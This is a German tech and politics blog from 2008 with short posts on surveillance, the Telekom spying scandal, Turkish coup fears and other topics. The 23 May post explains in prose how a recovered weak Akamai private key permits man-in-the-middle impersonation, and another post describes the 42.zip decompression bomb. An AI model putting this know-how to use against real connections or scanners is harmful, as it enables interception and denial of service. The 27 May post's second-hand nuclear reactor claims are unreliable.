Ach, die richterliche Kontrolle funktioniert? Ja WO DENN? Was hat die denn verhindert, die richterliche Kontrolle? Wie immer, wenn unsere Junta uns verarscht, kommt am Ende die Mär von dem bedauerlichen Einzelfall, "aber das System an sich funktioniert schon". Nee, klar. Ich sehe da nichts funktionieren. Die haben da vielen Menschen das Leben zur Hölle gemacht, und jetzt wird noch die Harms als Opfer dargestellt:
Der CDU-Innenexperte Wolfgang Bosbach sagte nach dem BGH-Beschluss, Generalbundesanwältin Monika Harms sei "in einer Rechtsfrage korrigiert worden. Das muss sie tapfer ertragen".
Hach Gott, die arme Harms, was die alles an Unbill ertragen muss!1!! Lange nicht mehr hat mich mein Mitgefühl so gebeutelt. Wie wäre es, wenn wir die Harms mal für jedes Jahr der Verfolgung Unschuldiger nach 129a einen Monat in den Knast tun? Wenn sie da lebend rauskommt, können wir mal sehen, wie viel Mitgefühl ich dann aufbringe. Die Frau hat sich ja in Nullkommanichts zum Feindbild hochgearbeitet, da hat selbst die Merkel länger gebraucht.

Fri Jul 4 2008

[l] Offenbar droht in der Türkei ein Militärputsch oder zumindest haben alle Angst vor einem. Der Verbotsprozess gegen Erdogans Regierungspartei ist bald durch, die Zeitungen berichten von Putschplänen, es gab eine Verhaftungswelle und diverse Razzien, wo 24 Leute unter dem Verdacht "regierungsfeindlicher Aktivitäten" verhaftet wurden — darunter zwei pensionierte 4-Sterne-Generäle.
Die Türkei ist seit Atatürk laizistisch, und das Militär hat traditionell dafür gesorgt, dass da keine Fundamentalisten an die Regierung kommen. Insofern ist das nicht völlig von der Hand zu weisen. Aber was die da gleich alles an Verschwörungsgeschichten haben, das wärmt mir das Herz:
Tatsächlich spricht einiges dafür, dass Basbug den Teil der Armee repräsentiert, den die Geheimorganisation "Ergenekon", zu deren Mitglieder die Verhafteten gehören sollen, erst unter Druck setzen wollte - damit sich das Militär letztlich einer Machtübernahme nicht entziehen kann.
Wie Ismet Berkan, Chef der linksliberalen "Radikal", in einem Leitartikel darlegte, gibt es aber viele Indizien dafür, dass bereits seit Amtsantritt der Erdogan-Partei AKP 2002 ein Teil des Offizierskorps darüber diskutierte, die Regierung "unbedingt zu stoppen". Damals war der am Dienstag verhaftete General Sener Eruygur Chef der Gendarmerie, und Hursit Tolon, der zweite verhaftete General, Heereschef.
Und sie haben da Details zu bisherigen Putsch-Plänen, 2002 und 2004, die offenbar am Generalstabschef Hilmi Özkök gescheitert sind. Es gab da ein Tagebuch des Marinechefs, das geleakt ist, und was der Admiral natürlich als Fälschung bezeichnet hat. Dann ist da noch die Rede von Zypern als Auslöser des Putsches:
Obwohl die Anklage gegen insgesamt mittlerweile rund 60 "Ergenekon"-Verhaftete erst in den kommenden Tagen vorgelegt werden soll, ist schon so viel bekannt: Die Organisation soll versucht haben, durch politische Attentate, gezielte Manipulation der Öffentlichkeit und mit Unterstützung besonders nationalistischer ziviler Organisationen so viel Chaos und Aufruhr zu schaffen, dass das Volk nach der Armee ruft - die die Ordnung wieder herstellt.
Und als ob das nicht schon alles hart genug wäre, gibt es dann auch noch eine angebliche Todesliste, u.a. soll das Militär auch hinter dem Mord des höchsten Richters gesteckt haben. Es steht auch ein Wechsel des Generalstabschefs an, und von dem neuen munkelt man, er sei für die Putschpläne.
Auch hatte der Ministerpräsident den künftigen Generalstabschef Basbug zu einem privaten Gespräch unter vier Augen eingeladen. Vorausgegangen war eine Kampagne islamistischer Zeitungen, die ein Foto von Basbug an der Klagemauer in Jerusalem druckten, um ihn als "Krypto-Juden" zu diskreditieren, der nicht Generalstabschef werden dürfe.
Erdogan soll dem Heereschef in dem Gespräch versichert haben, dass er seine Ernennung zum Generalstabschef unterstütze. Dass bei dem Treffen, sozusagen im Gegenzug, auch über das "Ergenekon"-Verfahren gesprochen wurde, hat Basbug allerdings heftig dementiert.
(Danke, Mathias)

Thu Jul 3 2008

[l] Die neuen Kinderschänder: Bus-Spotter. Das ist ein skurriles Hobby in England, ähnlich Train Spotting. Der Mann in dem Artikel macht das seit 40 Jahren, und hat über die Jahre 30.000 Fotos von Bussen und Trams gemacht. Aber jetzt wird er dafür offenbar derartig verfolgt, dass er das lieber aufgibt.
The credit controller, from Gloucester, says he now suffers "appalling" abuse from the authorities and public who doubt his motives.
The bus-spotter, officially known as an omnibologist, said: "Since the 9/11 attacks there has been a crackdown.
"The past two years have absolutely been the worst. I have had the most appalling abuse from the public, drivers and police over-exercising their authority.
Wieso nicht Terrorist? Das haben sie auch versucht, hat nicht so gut funktioniert:
"I can deal with the fact someone might think I'm a terrorist, but when they start saying you're a paedophile it really hurts."
Yeah! (Danke, Thomas)

Tue Jul 1 2008

[l] Die Briten haben sich ihre Kleingärten mit Dünger kaputt gemacht. Gruselige Geschichte:
The Royal Horticultural Society (RHS) has been inundated with calls from concerned gardeners who have seen potatoes, beans, peas, carrots and salad vegetables wither or become grossly deformed. The society admitted that it had no idea of the extent of the problem, but said it appeared 'significant'. The affected gardens and allotments have been contaminated by manure originating from farms where the hormone-based herbicide aminopyralid has been sprayed on fields.
Und wer hat dieses Gift hergestellt? Na klar, die üblichen Verdächtigen:
Dow AgroSciences, which manufactures aminopyralid, has posted advice to allotment holders and gardeners on its website.
Und natürlich haben die Konsumenten nichts, aber auch gar nichts zu befürchten:
'All we can say is that the trace levels of aminopyralid that are likely to be in these crops are of such low levels that they are unlikely to cause a problem to human health.'
Genau. Pflanzen sterben und haben Fehlbildungen, das sind also offensichtlich völlig ungefährliche Dosen. Nur aus formaljuristischen Gründen empfehlen sie den Verzehr nicht!1!!
The Dow website says: 'As a general rule, we suggest damaged produce (however this is caused) should not be consumed.' Those who have already used contaminated manure are advised not to replant on the affected soil for at least a year.
Krass. Oh und zu Dow: lest mal den Wikipedia-Artikel, Napalm, Agent Orange, und das Union Carbide Desaster.

Thu Jun 26 2008

[l] Das Weiße Haus hat es aber auch nicht einfach. Sie kriegen so viel Ärger wegen ihrer Einstellung zur Klimaveränderung. Und sie haben eine Umweltbehörde, die eine Studie gemacht hat, aus der hervor geht, dass man etwas gegen die Verschmutzung unternehmen muss. Was tut man da also? Man öffnet einfach deren Email mit den schlechten Ergebnissen nicht und tun dann so, als sei man nicht verpflichtet, die logischen Schlußfolgerung zu ziehen. Wie Kleinkinder, die sich die Augen zuhalten, und glauben, man würde sie dann auch nicht sehen.

Fri Jun 20 2008

[l] Wort des Tages: "Frencryption".
Beschreibt von staatlicher Seite aus heimlich schwach gemachte Kryptographie.
Wer auf solche Wortspiele steht, der wird auch meinen anderen Liebling mögen: "encraption". Für schwache Kryptographie und Snake Oil.
Und noch einer: "Orwellness" für die Selbstentblößung der Jugend von heute bei myspace, studivz und co.

Mon Jun 16 2008

[l] Der Staat versucht ja gerne, unpopuläre Dinge dann zu machen, wenn keiner hinguckt. Aktuelles Beispiel: Die Schweden, die ihren Geheimdienst alle Auslands-Telefonate und IP-Pakete abhören lassen wollen. Und das wird dann natürlich während der EM gemacht. Aber es funktioniert nicht wirklich: Die üblichen Boulevardblätter berichten darüber, auch durchaus kritisch. Lustiges Detail: Die Moderaterna ("gemäßigte Partei") droht Mitgliedern mit Rauswurf, wenn sie dagegen stimmen. (via)

Tue Jun 10 2008

[l] Gute Nachrichten: dieses Jahr gibt es voraussichtlich wieder einen Fnord Jahresrückblick.
Der Herr Kulla hat sich offenbar bei den Datenspuren hinreichend unbeliebt gemacht, dass wir wieder einen Slot frei haben für den Fnordrückblick. Frank und ich werden jedenfalls einen einreichen.

Mon Jun 9 2008

[l] Ah, Hillary hat endlich das Handtuch geworfen, dann kann die Schlammschlacht ja losgehen: McCain hat seine erste Frau, ein Ex-Model, weil sie nach einem Autounfall entstellt war, für eine Jüngere verlassen. Sie hatte ihm während seiner Folter in Vietnam die Fahne gehalten, und so hat er es ihr gedankt. Das ist das Material, aus dem US-Präsidenten gemacht werden!
Update: Gibt schon das erste Angriffsvideo, und sogar Ross Perot kommt für eine Runde McCain-Bashing aus der Rente zurück

Fri Jun 6 2008

[l] Ich weiß ja nicht, ob mir die erschütternde Inkompetenz von SPD, Grünen und Linken wirklich weniger gefährlich erscheinen sollte als die Bösartigkeit der CDU. Mein Lieblingsmodell ist: keiner hat die Mehrheit, Mehrheiten für alle Entscheidungen müssen einzeln erkämpft werden. Damit wieder sachbezogen abgestimmt wird, nicht nach Fraktion.
Aber diese Episode zeigt gut, wie bei uns Gesetze gemacht werden. Copy & Paste.

Wed Jun 4 2008

[l] Die CDU verkackt mal wieder auf ganzer Linie: Das Zentralabitur in NRW ist so ein Schlag ins Wasser, dass komplette Mathe-Leistungskurse in die Nachprüfung müssen, weil sie z.B. statt 11 nur 2 Punkte erreicht haben.
In einer Aufgabe zur Erdkunde-Leistungskursklausur war bei einer Frage zum Strukturwandel des Seehafens Wismar ein Komma verrutscht. Aus "19,058" wurde "190,58" Tonnen — Reaktion des Ministeriums: "Die Gesamtmenge aller Ostseehäfen war richtig angegeben." […]
Bei einer Pädagogik-Aufgabe zu Sigmund Freud hatten die Autoren aus "Gefühlen, die uns bewusst sind", ein "unbewusst" gemacht und so den Sinn ins Gegenteil verkehrt. Barbara Sommer [die zuständige Politikerin, CDU]: "Rückmeldungen haben ergeben, dass viele Schüler auch schon vor der Korrekturmitteilung das un überlesen haben und den Satz richtig verstanden hatten."
So viel geballte Inkompetenz und Frechheit ist selbst für die CDU uncharakteristisch. Ich wittere Kanzler-Material!

Tue Jun 3 2008

[l] Ein paar Verschwörungs-Gedanken zu dem Telekom-Skandal. Die Telekom (Bonn) zahlt einer kleinen Firma in Berlin 400k Euro dafür, aus 8000 Datensätzen nach 5 Journalisten und 3 Gewerkschaftern zu matchen. Da würde ich noch nicht mal grep für anwerfen, das kann man auch direkt im Texteditor machen. Wenn jemand so einen Daten-Matching-Auftrag an mich vergeben würde (und der moralisch einwandfrei wäre), würde ich da einen Manntag für berechnen, und optional eine Präsentation der Ergebnisse beim Kunden im Haus anbieten. 400 Kiloeuro?!?
Ich finde ja, dass das alles stinkt. Nicht nur dass die so viel Geld gezahlt haben. Denkt doch mal drüber nach. Die Dienstleistung ist ein Filtern von Datensätzen. Die Telekom hat denen 8000 Datensätze gegeben. Von vielen Milliarden. Die Telekom hat also … Datensätze gefiltert, um sie einer Firma zu geben, um sie zu filtern. Offensichtlich kann die Telekom schon selber filtern, sonst hätten sie dieser Firma nicht 8000 sondern mehrere Milliarden Datensätze geben müssen.
Wieso ging dieser Auftrag also überhaupt an diese Firma, wenn die Telekom das auch selber gekonnt hätte? Normalerweise erklärt sich sowas mit Vetternwirtschaft, aber die Telekom-Vettern sitzen alle in Bonn, nicht in Berlin. Für mich sieht das ja nach Vorbereitung für eine Erpressung aus.
Wenn ich der Telekom-Vorstand wäre, und ich bräuchte diese Daten, dann würde ich das doch nicht an eine externe Firma rausgeben, den Auftrag! Und schon gar nicht so, dass die externe Firma mitkriegt, was sie da tut! Ich hätte das wie folgt gemacht. Ich wäre zum Datenbank-Admin gelaufen und hätte dem gesagt, ich bräuchte eine Live-OLAP-Demo, zum Evaluieren der Performance für zukünftige Anforderungen. Bzw haben die vermutlich sogar schon sowas für ihre Fraud Detection, die machen ja nichts anderes als Data Mining. Dann würde der Datenbank-Admin mir da ein Tool bzw ein Webfrontend geben für OLAP, und da würde ich dann nach den Gewerkschafter-Nummern und meiner Nummer fragen. Und dann nach ein paar zufälligen Zielnummern. Und dann nach den gewünschten Zielnummern. So weiss außer mir selber niemand, dass da gerade etwas anrüchiges stattgefunden hat.
Stattdessen maximiert die Telekom geradezu die Anzahl der Leute, die hier mitkriegen, dass da was streng riecht. Jemand filtert die Datensätze des Gewerkschafters raus und exportiert das als XML / CSV / whatever. Das ist schon mal anrüchig. Dann gibt jemand vertrauliche Daten an eine externe Firma weiter, das ist auch anrüchig. Und dann weiss diese Firma auch noch, was sie da matchen soll, das ist gleich der nächste potentielle Erpresser.
Warum würde jemand in der Telekom Kompromat sammeln? Ich vermute ja, das war jemand von vor Obermann. Obermann hat da die alte Garde geschasst, die haben das vorher kommen sehen, haben Kompromat gesammelt (und denkt mal drüber nach, kein anderer Datensatz hätte so für Aufsehen gesorgt wie Gespräche zwischen einem Gewerkschafter und einem Journalisten, das ist schon doppelt geschützt), und als Obermann nicht mit sich reden ließ und sie in Frühpension schickte oder so, da haben sie die Bombe platzen lassen. Oder so.

Sat May 31 2008

[l] 111 Nationen unterzeichnen den Streubomben-Sperrvertrag. Alle, eigentlich, bis auf die USA, Russland, China und Israel. Bis auf genau die also, deretwegen der Vertrag gemacht wurde.

Fri May 30 2008

[l] Noch mal zu Gauweiler und Schachtschneider: ich bin kein Fan von denen. Der Gauweiler ist in der CSU und der Schachtschneider gibt der Jungen Freiheit Interviews. Und ja, die sind aus den falschen Gründen gegen den Vertrag von Lissabon. Ich linke trotzdem darauf, weil die Linken ja bisher ihren Arsch nicht hochgekriegt haben. Überhaupt habe ich den Eindruck, dass die Linken ihre Politik wie ein gelangweilter Blogger betreiben, die sind erstmal aus Prinzip DAGEGEN!!1!, weil sie in der Opposition sind, und bringen die selben Buzzwords, die sie seit 50 Jahren bringen, soziale Gerechtigkeit, blah blah, das ist viel zu unkonkret, um das als Kritik ernst zu nehmen. Der Nationalismus der Rechten ist natürlich auch transparent, aber immerhin haben sie sich die Mühe gemacht, einige inhaltliche Argumente zu sammeln. Ein interessanter Zusammenhang ist bisher noch nicht so durch die Presse gegangen: einer der großen Mandanten von Gauweiler ist Leo Kirch. Diese Verfassungsklage wird uns also von Kirch und den Bundesliga-~~Proleten~~ Fans finanziert. Das macht es auch nicht einfacher.
Meine Einstellung dazu ist: man muss immer stark aufpassen, wenn man plötzlich mit den Nazis auf einer Seite steht. So ist das nicht nur in diesem Fall, sondern auch wenn ich mich mal kritisch zu Israels Politik äußere, das tut mir auch immer in der Seele weh, wenn das dann von irgendwelchen Nazis instrumentalisiert wird oder die auf den Zug aufzuspringen versuchen. Daher: man muss sich dessen bewußt sein. Ich sehe das mit Gauweiler und Schachtbrenner wie mit der CIA und den Mujaheddin (nur dass wir keine Waffen liefern sondern nur Popcorn mampfend daneben sitzen und zugucken). Nicht zu laut anfeuern, aber schon freuen, wenn die gewinnen. :-)

Thu May 29 2008

[l] Ich finde den Telekom-Skandal übrigens schon deshalb großartig, weil sich daran so schön illustrieren läßt, was an der Vorratsdatenspeicherung so schlecht ist. Für mich besteht genau NULL Unterschied zwischen "die Telekom schnüffelt unegal in meinen Daten herum" und "das BKA schnüffelt unegal in meinen Daten herum". Klar, das BKA hat da lauter Augenwischerei-Ansagen wie "wir benachrichtigen Sie dann" und "bei uns muss ein Richter zustimmen", aber in der Praxis beruhigt mich das natürlich überhaupt nicht.
Die Benachrichtigungspflicht, das könnte mir ja auch die Telekom versprechen. Versprechen von Leuten, die meine Daten mißbrauchen können, sind schlicht nichts wert.
Und Richter gehören für mich zu dem gleichen System wie die Schnüffel-Gangster des BKA selbst. Das ist wie wenn mir die Telekom verspricht, sie würden erst den Vorstand fragen. Das hat ja im aktuellen Fall auch nicht geholfen.
Alle Sachen, die der Staat uns versprechen kann, um uns die Sorgen vor den Schnüffelstaat zu nehmen, kann uns genau so die Telekom versprechen. Und dann wäre es genau so wenig wert wie es beim Staat wert ist. Ich bin mir sicher, auch bei der Telekom gibt es total unabhängige interne Gremien, hinter deren "Unabhängigkeit" sie sich argumentativ verstecken könnten.
Das einzige, was mich RICHTIG ärgert an dem Telekom-Skandal ist, dass die verlogene Staatsanwaltschaft da jetzt einen auf dicke Hose macht und Hausdurchsuchungen vornimmt, als wäre Abhören, Beschnüffeln, illegal in anderer Leute Daten herumfummeln, nicht Standard bei unseren Repressionsbehörden. Wir haben ja schon gehört, dass sie den Bundestrojaner schlicht illegal eingesetzt haben (und das hätten sie natürlich weiter getan, wenn wir da kein Fass aufgemacht hätten).
Und so ist das mit dem Staat genau wie mit der Telekom. Von alleine kommt da gar nichts raus. Wenn sie können, verschweigen sie alles. Auch bei der Telekom wird das Management periodisch ausgetauscht, und trotzdem bewegt sich da nichts in die richtige Richtung. Genau wie in der Politik. Ich finde, die Telekom ist das perfekte Abbild unseres Staates. Kein Wunder also, dass da auch genau die gleichen Dinge falsch laufen.

Wed May 28 2008

[l] "Der Berliner Datenspion, der für die Telekom hunderttausende Verbindungen überprüfte, packt aus". Und natürlich war es der Betriebsratschef, das weiß doch jeder, Betriebsräte sind schlecht für die Wirtschaft, die machen immer nur alles kaputt. [Diese Nachricht wurde ihnen präsentiert von Bertelsmann]
Mal Spaß beiseite. Ist der Typ irre? Schlimm genug, dass er so einen Job überhaupt gemacht hat, jetzt präsentiert er sich auch noch mit seinem Namen und dem Namen seiner Firma in der Presse und nennt den Namen des Opfers? Entweder das ist eine Nebelkerze oder der will in den Knast. Oder der Kniebrecher-Markt ist lukrativ und er will da jetzt groß rauskommen.
Ich finde ja auch bemerkenswert, wie viel Kohle der da in Rechnung gestellt hat. Der Artikel spricht von Außenständen von 400.000 Euro. Für das Geld kann man mich mehrere Jahre lang einstellen. Und ein bißchen Perl zum Datensatz-Abgleichen, ich bitte euch, das kann ja wohl jede studentische Hilfskraft. Und, äh, für die Diskretion werden sie ja wohl nicht so viel gezahlt haben, mit der ist es ja offensichtlich nicht so weit her.

Tue May 27 2008

[l] Ich habe mich hier gerade mit einem Atom-Nerd unterhalten, der früher in Idaho an einem Versuchsreaktor gearbeitet hat. Das Gespräch ging los mit den Reaktoren in China und der Erdbebensicherheit. Er meinte, Atomreaktoren müssen seit den 70ies weltweit einen Fail Safe Modus haben, damit sie, wenn das Kühlsystem versagt, von alleine runterfahren. Das würde auch die gesamte Welt zu machen, außer Russland. Der Grund sei, dass ein solches Fail-Safe-Design rund 40% Energieeffizienz kostet, und Russland sei eben Effizienz wichtiger als dass es nicht Bumm macht. :-)
Ich ließ mir dann noch erklären, wieso man eigentlich das Uran so anreichert für Reaktoren, wenn nur ein Bruchteil davon überhaupt reagiert; der Grund ist, dass der Austausch der Brennstäbe so teuer ist.
Dann wollte ich wissen, wieso es immer heißt, Atomkraftwerke würden einen Tag für das Hochfahren brauchen; stellt sich raus, dass die Reaktoren innerhalb von Minuten hochfahren können, aber der ganze operationelle Bürokratieaufwand und das ganze Checken von allen Einstellungen und so weiter, das kostet einen Tag.
Dann fragte ich, woher man eigentlich weiß, daß Reaktoren erdbebenfest sind. Er meinte: "500 pound bombs under the superstructure". Wer sagt, dass man mit Atomkraft keinen Spaß haben kann? :-)
Es gab dann da noch ein paar interessante Details zu dem Reaktor, den die Japaner benutzen, der da kürzlich das Erdbebenproblem hatte, wo ein bißchen Kühlflüssigkeit austrat. Dieser Reaktor ist interessanterweise säurebasiert. Das Uran kommt nicht als Brennstab in den Reaktor, sondern wird kleingemahlen und den Staub lösen sie dann in Säure auf. Das erhöht die Effizienz der Reaktion, aber ist offenbar ein japanischer Alleingang. Die Hitze wird dann über drei Kühlkreisläufe in Kaskade gemacht, die Säure gibt über eine Trennwand ihre Wärme an den ersten Kreislauf ab, der gibt das an den zweiten ab, der gibt das an den dritten ab, und der macht dann erst Dampf und die Turbine. Die ganzen Kreisläufe sind dafür da, dass ein Leck in einem der Kreisläufe nahe beim Reaktor keine Radioaktivität weiterleiten kann über den Dampf. Und ein Leck kann auch keinen Bumm erzeugen, weil das AKW ja wie oben erwähnt automatisch runterfährt, wenn die Kühlung versagt, und das testen sie auch tatsächlich live an allen Reaktoren, indem sie die Kühlflüssigkeit rauslassen und den Reaktor so heiß betreiben wie sie können. Das ist auch nicht so, dass da mechanisch jemand etwas abdreht, sondern die Reaktor-Designs sind so, dass die Reaktion sich selbst kaputt macht, wenn die Hitze nicht abgeführt wird. Eine besonders elegante Variante davon hat er mir erklärt, wo die Brennstäbe sich verformen, und sich aber gegenseitig im Weg stehen. Die Brennstäbe sind aber keine tatsächlichen Stäbe sondern eher eine Art Fläche, bei der Verformung senkt sich die Fläche. Die herausfliegenden Neutronen aus den anderen Brennstäben treffen dann mit immer weniger Wahrscheinlichkeit die anderen Brennstäbe, weil die sich unter der Hitze verformt haben, und damit fährt sich die Reaktion von alleine herunter.
Am Ende hat er noch den Vorschlag unterbreitet, das Uran einfach da wieder in der Erde zu vergraben, wo man es vor der Reaktion gefunden hat, dann könne man den Leuten vielleicht begreiflich machen, dass man unter dem Strich die Radioaktivität sogar gesenkt hat. Er ist ein Proponent der Atomenergie, wie ihr vielleicht gemerkt habt :-)

Fri May 23 2008

[l] [scroll down for the English version]
Nachschlag zur Debian-Sache: ich hatte ja erzählt, dass whitehouse.gov betroffen war. Nun, stellt sich raus, auch Akamai ist betroffen. Akamai, das sagt vielleicht dem einen oder anderen nichts, das ist ein Content Distribution System. Das wird von allen möglichen Sites benutzt, u.a. von ATI für den Treiber-Download, und, besonders pikant, ELSTER zum Formular-Download für die Steuern:
Download
Der Download erfolgt von einem externen Server des Anbieters Akamai "a248.e.akamai.net" der von der Finanzverwaltung für die Bereitstellung der ElsterFormular-Dateien genutzt wird.
Was heißt das jetzt konkret? Deren X.509-Zertifikat ist ja public, wurde von deren Webserver ausgeliefert. Inzwischen haben sie den natürlich ersetzt. Aber wer schnell genug war (und jemand war schnell genug und hat mir das gemailt), der hat jetzt ein Zertifikat mit dazugehörigem Private Key von "a248.e.akamai.net".
Was heißt das? Nun, dieses Zertifikat ist ja signiert. Von einer CA, der die Browser der Welt vertrauen. Ich kann mich jetzt also mit diesem Zertifikat hinstellen und Browsern gegenüber erfolgreich behaupten, ich sei Akamai. Konkret: wenn jemand neben mir auf einer LAN-Party einen ATI-Treiber runterläd, oder sein Steuer-Formular zieht, kann ich mich in die TCP-Verbindung einklinken, und dann ist der SSL-Schutz ausgehebelt.
Um den Schaden von sowas zu minimieren haben SSL-Zertifikate eine Verfallsdauer von einem Jahr (naja, einstellbar, aber üblicherweise ist es ein Jahr). Dieses Akamai-Zertifikat läuft im Oktober aus. Ich habe das Zertifikat lokal geprüft und es funktioniert. Also, mal unter uns: das ist eine echt große Katastrophe. Nicht nur für Akamai. Es gibt auch nichts, was Akamai tun kann. SSL hat für solche Fälle die Idee einer Revocation List, aber das skaliert nicht und daher haben die Browser das alle abgeschaltet oder gar nicht erst implementiert. PKI funktioniert schlicht nicht in der Breite. SSL ist überhaupt ein Kapitel für sich. Habt ihr mal in eurem Browser die Liste der CAs angeschaut, denen euer Browser vertraut? Kennt ihr auch nur bei einer davon nähere Informationen, die Vertrauen rechtfertigen würden? Seht ihr? Ich auch nicht.
Ich möchte noch eine Sache bestonen: Akamai hat sich hier nichts vorzuwerfen. Die haben alles richtig gemacht. Wir bauen unser Kryptographie-Fundament auf Sand, da kann man noch so tolle Best Practices haben und einhalten. Im Übrigen gelten diese Überlegungen auch für alle anderen Varianten, wie jemand an einen Private Key kommen kann, z.B. Einbruchsdiebstahl. Und es gilt analog für alle anderen Public Key Systeme und PKIs im Moment, z.B. bei e-Government und der Gesundheitskarte. Skalierender Schlüsselrückruf ist ein ungelöstes Problem.
Update: Noch ein Nachschlag zu ELSTER. Stellt sich raus, dass die Elster-Leute auch noch ein Cross Site Scripting Problem haben, und man gar nicht SSL spoofen muss, um denen den Bundestrojaner unterzujubeln. Danke an Thomas für den Hinweis.
Update: Alexander Klink hat offenbar auch eine große deutsche Bank mit dem Problem gefunden, und, besonders hart: deren Zertifikat läuft erst in drei Jahren ab.
English version.
In the wake of the Debian weak key issue it was revealed that whitehouse.gov had a weak key. It turns out that the Akamai SSL key is also weak. Akamai, in case you never heard of them, is a major content distribution network. They have tens of thousands of servers distributed over the world. If you have a high traffic web site, you can contract with them, and they will host it and redirect visitors to the site closest to them. Their customer list includes Microsoft, the New York Times, and — particularly interesting for this — ATI's driver downloads.
Akamai obviously replaced their keys immediately. BUT. If you were quick enough, you could get their old public key (it is sent as part of the SSL handshake), and since the private key is weak (there are only 32k possible keys), you can generate the private key to it. Someone did (who wishes to remain anonymous) and sent the key to the CCC. I verified it. The key works. The part that has not sunk in yet for most people is: the public key is signed by a CA that browsers trust. I have a public key and a private key. I can now impersonate Akamai. If I can manipulate your TCP connection (which is easy, for example, if you are using Wifi or are on the same LAN with me), I can send you malware instead of the ATI driver.
SSL has two defenses for this. First: keys expire. This particular key expires October 2008. Second: Certificate Revocation Lists. SSL originally had the idea that CAs would publish a list of compromised keys, and as part of the SSL handshake, the browser would check if the key is on the list. The problem is: that does not scale. At all. There are billions of SSL connections being established per second, Verisign can not possibly pay for the traffic to send their list to everyone. So — noone checks the CRLs. This is the main reason why PKI does not work in practice.
One more thing: I'd like to stress that Akamai did nothing wrong here. They did everything right and still have a problem. The same problem occurs if someone gets the private key by some other means, for example breaking and entering. The foundation upon which we build our infrastructure is less stable than most people realize.

Tue May 20 2008

[l] Ich lese gerade Legacy of Ashes über die CIA und das ist ein Kracher nach dem anderen. Ich bin auf Seite 202, und habe jetzt schon überhaupt gar keinen Respekt für die CIA mehr übrig. Das ist nicht so, dass die mal toll waren, und dann zum Irak hin immer schlechter, nein, die waren einfach immer schon so schlecht. Und nicht nur die CIA, auch an den ganzen Präsidenten läßt das Buch kein gutes Haar. Ich zitiere mal einen kurzen Abschnitt über JFK, als sie gemerkt haben, dass in Kuba Atomraketen der Russen stationiert waren.
The president now contemplated the question of a nuclear war over Cuba. He began to grasp how little he understood the Soviet leader. "We certainly have been wrong about what he's trying to do," the president said. "Not many of us thought that he was gonna put MRBMs on Cuba." Nobody save John McCone, Bundy muttered. Why had Khrushchev done it? the president asked. "What is the advantage of that? It's just as if we suddenly began to put a major number of MRBMs in Turkey," he said. "Now that's be goddamn dangerous, I would think."
A moment of awkward silence fell. "Well, we did it, Mr. President," said Bundy
Das muss man sich mal auf der Zunge zergehen lassen! Die CIA hatte keine Ahnung, dass die Russen da Raketen stationieren würden, nur einer in der CIA hat das voraus gesagt, und auch nur aus Bauchgefühl heraus. Dabei ist das doch sonnenklar, die Amis haben Russland schließlich aus der Türkei heraus mit Raketen bedroht, was haben die denn gedacht, was die Russen tun würden, wenn sie eine solche Gelegenheit bekommen? Und dass Kennedy vergisst, dass er ja mit dem Atomraketen-Ausrichten angefangen hat, da fehlen mir echt die Worte.
Wenn ich mir angucke, was für eine hohe Meinung die Leute heute von Eisenhower und Kennedy haben, und was das doch alles für Verlierer waren, allen voran natürlich die CIA. Gut, Reagan spielt in Klasse für sich, aber selbst Bush sieht da plötzlich gar nicht mehr so abnorm aus. JFK hat sich da offenbar wie ein wilder Hamster aufgeführt, ständig mehr Sabotageakte gegen Kuba gefordert, dauernd neue Angriffsorders rausgehauen. Überhaupt scheint die CIA noch nie irgendwas mit "Intelligence" zu tun gehabt zu haben, die haben immer nur überall rumgeputscht. Bis zum Ende der Kennedy-Amtszeit hatten sie überhaupt nur einen erwähnenswerten Agenten in der Sowjetunion und das war ein Freiwilliger, den haben die nicht etwa angeworben, der kam zu ihnen. Und das haben sie auch erst mal vier Monate lang verkackt, weil sie nicht wußten, wie man sowas macht, und weil sie ängstlich waren. Mann Mann Mann.
Oh, am Rande. Die U2-Spionageflugzeuge sind ihnen reihenweise runtergeholt worden, sogar von China unter Mao. Von wegen unverwundbare Technologie und fliegt so hoch, da kommt keiner ran.
Bei der CIA kann man auch beobachten, was man bei uns prima beobachten kann: Geheimdienste sind nicht kontrollierbar. Bei den Amis ist es schriftlich in den Akten, dass die CIA-Chefs (allen voran der Herr Dulles, nach dessen Bruder in Berlin eine Straße benannt ist) das Weiße Haus, den Kongress und den Präsidenten nach Strich und Faden belogen haben, um ihren Arsch abzusichern. Die haben da U2-Flüge durchgeführt, und es dann geleugnet, und haben sogar gegen das explizite U2-Flugverbot verstoßen. 3. Weltkrieg? Who cares!
Noch ein interessantes Detail: Kennedy hat die CIA gegen einen New York Times Journalisten schnüffeln geschickt. Schon damals also ein inländisches Abhörprogramm. Lange vor Nixon und seinen "Klempnern". Und auch die Präsidenten Johnson, Nixon und jetzt natürlich Bush lassen wieder im Inland schnüffeln, aber den Präzedenzfall hat der ach so saubere JFK geschaffen.
Zur Kuba-Krisa noch: JFK sah drei Optionen: Luftangriff auf die Raketensilos (nur leider waren das mobile Raketenabschussbasen), größerer Luftangriff (der halb Kuba plattgemacht hätte) und eine komplette Invasion Kubas. Die Blockade kam erst von dem McCone auf den Tisch. Dieser Wahnsinnige hätte da mal eben den Weltkrieg losgetreten, auf Verhandeln ist überhaupt niemand gekommen. Wie ein tollwütiger Hamster eben.

Mon May 19 2008

[l] Wiefelspütz läßt keinen Zweifel daran, dass die SPD nie wieder gewählt werden möchte:
Nach Meinung des SPD-Politikers ist es ausgemachte Sache, dass die rasante Entwicklung in der Kommunikationstechnologie dazu führt, dass sich eine Lücke zwischen den Strafverfolgern und Geheimdiensten auf der einen Seite, Terroristen und organisierter Kriminalität auf der anderen Seite auftut. Diese technologische Lücke müsse mit einem Abhör-Kompetenzzentrum schnellstens geschlossen werden. "Mir geht das alles sogar ein bisschen zu langsam," betonte Wiefelspütz.

Sun May 18 2008

[l] Es ist ja bekannt, dass Antiviren Schlangenöl sind, verkauft von unseriösen Geschäftemachern, die ihren Kunden unwirksamen Pseudo-Schutz verkaufen. Ich habe die Position seit vielen Jahren vertreten, und habe als Beispiel dafür seit gut 10 Jahren 42.zip verlinkt. Dieses ZIP-Archiv beinhaltet Nullen. Nur Nullen. Keinen Code. Null-Bytes. VIELE Null-Bytes. Das ganze gezippt, das Ergebnis wieder gezippt, das ganze nochmal gezippt, diverse Iterationen, so dass das ZIP-File am Ende 42K groß ist, aber die ausgepackten Daten einige Terabyte oder so beanspruchen auf der Platte. Ein Antivirus kann das entweder scannen, dann den gesamten Plattenplatz und eine ganze Weile CPU-Zeit belegen, und solange das System unbrauchbar machen (und damit seine Mission nicht erfüllt haben), oder er aufgeben (und damit seine Mission nicht erfüllt haben).
